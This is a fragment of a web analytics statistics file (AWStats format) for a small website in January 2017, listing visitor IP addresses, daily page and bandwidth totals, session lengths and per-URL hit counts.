45.55.229.90 1 13 508461 20170110003334
54.196.23.67 1 1 72188 20170119152828
157.50.93.168 5 52 4665293 20170128081547
80.67.172.162 1 1 72187 20170105110226
211.123.206.72 1 1 72187 20170112201414
122.177.166.254 6 70 6078095 20170125015155
183.83.51.10 5 56 5480364 20170126002525
208.90.57.196 2 2 107698 20170130011424
185.110.132.231 7 7 505309 20170131103000
45.32.131.61 1 1 72187 20170116031733
209.236.68.130 1 1 26198 20170104113111
115.112.233.233 10 64 7302175 20170118054358
110.93.199.250 1 1 72188 20170124031312
23.247.8.42 1 1 72187 20170103082059
106.208.146.237 7 127 12962259 20170104065858
107.179.122.163 1 1 72188 20170121035246
117.203.147.161 1 1 72188 20170120025737
159.203.171.32 1 13 508462 20170123110732
23.247.72.122 1 1 72187 20170116113454
64.185.231.58 1 1 72188 20170123062133
54.234.189.185 1 1 72187 20170110221820
103.224.145.251 7 71 6114227 20170128135048
197.148.58.232 1 1 72188 20170121184458
94.250.180.80 1 1 72187 20170109064133
79.113.50.170 1 1 72188 20170119103328
103.203.173.158 7 71 6150280 20170104050645
110.53.133.88 0 1 1472314 
106.208.33.146 5 56 5252186 20170110010012
23.19.32.82 1 1 0 20170127211215
93.186.31.80 1 1 9939 20170131010825
117.201.9.245 6 69 6076793 20170123085816
66.220.156.115 0 1 57438 
69.12.81.229 1 1 72187 20170102022502
23.228.111.122 1 1 72188 20170119062627
66.102.7.233 5 33 4401651 20170108090343
195.2.253.2 5 5 360935 20170121045216
210.186.12.121 0 1 103768 
169.149.13.141 6 70 6078093 20170114013924
88.91.204.158 1 1 72188 20170131175702
202.142.69.243 1 1 72188 20170128043257
83.161.157.199 1 1 72188 20170120181603
157.55.39.250 0 5 84151 
199.30.24.245 6 57 5547544 20170121203308
186.223.84.103 1 1 72187 20170121153936
107.167.111.47 1 1 72187 20170113063619
66.102.8.27 0 1 50841 
173.252.90.232 0 1 57438 
45.32.130.173 1 1 72187 20170106200811
49.33.128.141 9 105 11030512 20170127133352
104.131.31.176 6 6 391291 20170123211143
66.102.7.250 0 3 155592 
109.150.47.10 1 1 72188 20170122090747
60.191.38.77 8 8 469244 20170126181414
109.86.71.21 1 1 11110 20170119161932
157.50.189.101 1 11 399008 20170109081833
197.87.181.140 1 1 72187 20170117065103
157.50.211.241 1 12 1012621 20170109101857
79.119.232.185 1 1 72188 20170122085236
82.84.137.253 1 1 72188 20170119031455
157.50.13.17 1 15 1614836 20170131100146
104.236.93.213 1 13 508461 20170101154606
45.51.44.3 1 1 10237 20170122024024
106.51.18.232 0 1 111189 
176.47.82.231 1 1 72188 20170129215324
5.246.117.69 1 1 72188 20170123200428
95.211.216.24 1 1 72188 20170128193523
64.233.172.143 8 130 15601634 20170113135513
182.186.39.172 1 1 72188 20170128071021
181.66.220.19 1 1 72188 20170130223648
71.6.167.142 1 1 72187 20170104134751
223.190.67.38 6 69 6076793 20170131010100
82.80.249.143 0 3 704986 
186.55.77.22 1 1 72188 20170119150204
45.55.206.213 6 6 391285 20170102035521
173.252.123.129 0 2 114876 
176.31.64.186 6 6 216790 20170128232123
138.197.96.143 1 13 508462 20170128150608
106.51.154.177 6 71 6173209 20170121024847
103.213.195.227 5 56 5480363 20170102074750
23.247.27.122 1 1 72188 20170123020528
45.55.72.105 6 6 391285 20170110141030
178.220.74.176 1 1 72188 20170125094438
66.102.7.249 0 10 983582 
91.223.133.17 1 1 0 20170117211134
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20170101 16 151 15705825 7
20170102 44 337 35427652 13
20170103 29 160 12970926 13
20170104 52 532 53886149 15
20170105 33 308 31538013 12
20170106 19 191 17838827 11
20170107 18 114 9126522 5
20170108 20 219 18891423 8
20170109 35 352 33326334 12
20170110 25 242 23155585 10
20170111 6 13 590265 2
20170112 11 107 9776396 8
20170113 36 359 38506229 12
20170114 12 127 11594587 3
20170115 12 78 6366850 7
20170116 34 205 18262050 14
20170117 33 226 19012480 17
20170118 64 516 56137727 12
20170119 29 195 18821759 16
20170120 22 89 6575389 15
20170121 44 310 28411424 20
20170122 14 15 953150 9
20170123 37 229 19110726 16
20170124 80 446 43222973 18
20170125 50 361 31442909 14
20170126 27 131 12081416 13
20170127 61 287 27304517 13
20170128 50 329 29535890 20
20170129 13 50 3811482 8
20170130 17 18 1427266 11
20170131 77 645 59932581 22
END_DAY

# Session range - Number of visits
BEGIN_SESSION 6
5mn-15mn 9
0s-30s 315
15mn-30mn 4
30s-2mn 31
2mn-5mn 14
30mn-1h 3
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 38
/ 338 23522362 309 222
/contente.php 88 103849 14 14
/contact.php 81 2927258 11 43
/fonts/Rounded%20Elegance.ttf 75 12161160 2 10
/fonts/glyphicons-halflings-regular.woff2 72 1279988 1 2
/fonts/helvetica/Helvetica.woff2 71 858480 5 1
/fonts/pacifico/Pacifico.woff2 69 1683408 0 19
/international.php 43 4940504 6 21
/domestic.php 36 2113171 3 8
/about_us.php 35 1242830 1 3
/fonts/pacifico/Pacifico.svg 9 3608037 0 5
/fonts/helvetica/Helvetica.woff 3 44292 1 2
// 1 72187 1 0
/fonts/helvetica/Helvetica-Bold.eot 2 57640 0 0
/googlef32d9fa0f64cf5c4.html 1 53 1 1
//cgi-bin/test-cgi 1 391 0 1
/fonts/pacifico/Pacifico.ttf 1 43632 0 1
/fonts/helvetica/Helvetica.ttf 1 27168 1 0
/fonts/glyphicons-halflings-regular.woff 1 23424 0 0
/fonts/pacifico/Pacifico.eot 2 87640 0 0
/fonts/glyphicons-halflings-regular.ttf 1 45404 0 0
/fonts/helvetica/Helvetica.eot 2 47648 0 0
/fonts/glyphicons-halflings-regular.eot 2 40254 0 0
/fonts/pacifico/Pacifico.woff 2 211392 0 0
/js/ 1 3319 1 1
/fonts/helvetica/Helvetica-Bold.ttf 1 53100 0 0
/fonts/glyphicons-halflings-regular.svg 9 978642 4 4
/fonts/helvetica/Helvetica-Light.ttf 1 25112 0 0
/fonts/helvetica/Helvetica-Bold.woff2 5 150760 0 0
/fonts/helvetica/Helvetica-Light.woff2 6 67080 1 0
/fonts/helvetica/Helvetica.svg 9 586053 3 5
/index.php 30 2165620 2 5
/cgi-bin/test-cgi 4 1564 2 2
/fonts/helvetica/Helvetica-Bold.woff 1 34488 0 1
/fonts/helvetica/Helvetica-Light.woff 2 27832 0 0
/fonts/helvetica/Helvetica-Light.eot 2 44600 0 0
/fonts/helvetica/Helvetica-Light.svg 9 534177 6 3
/mail.php 3 138 1 2
END_SIDER
